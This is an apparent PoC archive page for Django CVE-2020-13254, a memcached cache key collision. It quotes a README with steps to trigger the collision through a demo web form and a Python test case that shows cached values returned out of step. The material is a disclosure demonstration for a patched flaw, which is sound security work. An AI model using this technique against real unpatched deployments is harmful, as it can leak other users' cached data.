Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-13254 PoC — Django 信任管理问题漏洞

Source
https://github.com/danpalmer/django-cve-2020-13254
Associated Vulnerability
Title:Django 信任管理问题漏洞 (CVE-2020-13254)
Description:An issue was discovered in Django 2.2 before 2.2.13 and 3.0 before 3.0.7. In cases where a memcached backend does not perform key validation, passing malformed cache keys could result in a key collision, and potential data leakage.
Description
Vulnerability demonstration for Django CVE-2020-13254
Readme
# Django CVE-2020-13254

This repository demonstrates exploitation of CVE-2020-13254 in two ways – via a
web interface and via a failing test case.

For more details visit:

<https://danpalmer.me/2020-06-07-django-memcache-vulnerability/>

### Exploiting via the web

The example provides a web interface with 2 forms, one that sets values in the
cache and the other that gets them. These are directly translated into calls to
the Django cache backend. Because the codebase does not implement any session or
authentication system, multiple uses in the same browser tab are
indistinguishable from multiple users using between machines.

To exploit:

1. Set keys of **A** and **B** to values **a** and **b**.
2. Attempt to set **C D** to value **c d**. This will error.
3. Attempt to retrieve key **A**, there will incorrectly be no result.
4. Attempt to retrieve key **B**, the result will incorrectly be **a**.

### Demo via tests

This process can be expressed as a test case as such:

```python
from django.core.cache import cache
from django.test import TestCase


class CacheTests(TestCase):
    def test_cache(self):
        cache.set('k1', 'v1')
        cache.set('k2', 'v2')
        try:
            cache.set('a b', 'v3')
        except Exception:
            pass
        self.assertEqual(
            [
              cache.get(x) for x in
              ['k2', 'k1', 'k2', 'k1', 'k2', 'k1']
            ],
            ['v2', 'v1', 'v2', 'v1', 'v2', 'v1'],
        )
```

This fails with the following error:

```
=============================================================
FAIL: test_cache (demo.tests.CacheTests)
-------------------------------------------------------------
Traceback (most recent call last):
  File "tests.py", line 30, in test_cache
    'v1',
AssertionError: Lists differ

First differing element 0:
None
'v2'

- [None, 'v2', 'v1', 'v2', 'v1', 'v2']
?  ------

+ ['v2', 'v1', 'v2', 'v1', 'v2', 'v1']
?                              ++++++

-------------------------------------------------------------
```

After the `set`, the cache results being returned are out of step with the
queries being made.
File Snapshot

 [4.0K]  /data/pocs/b23ac93b862959c9e56a658bcd2e075f5e2c0e92
├── [4.0K]  demo
│   ├── [4.0K]  demo
│   │   ├── [ 385]  asgi.py
│   │   ├── [   0]  __init__.py
│   │   ├── [1.3K]  settings.py
│   │   ├── [4.0K]  templates
│   │   │   └── [ 493]  index.html
│   │   ├── [ 702]  tests.py
│   │   ├── [ 132]  urls.py
│   │   ├── [ 393]  views.py
│   │   └── [ 385]  wsgi.py
│   └── [ 624]  manage.py
├── [2.1K]  README.md
└── [  73]  requirements.txt

3 directories, 11 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →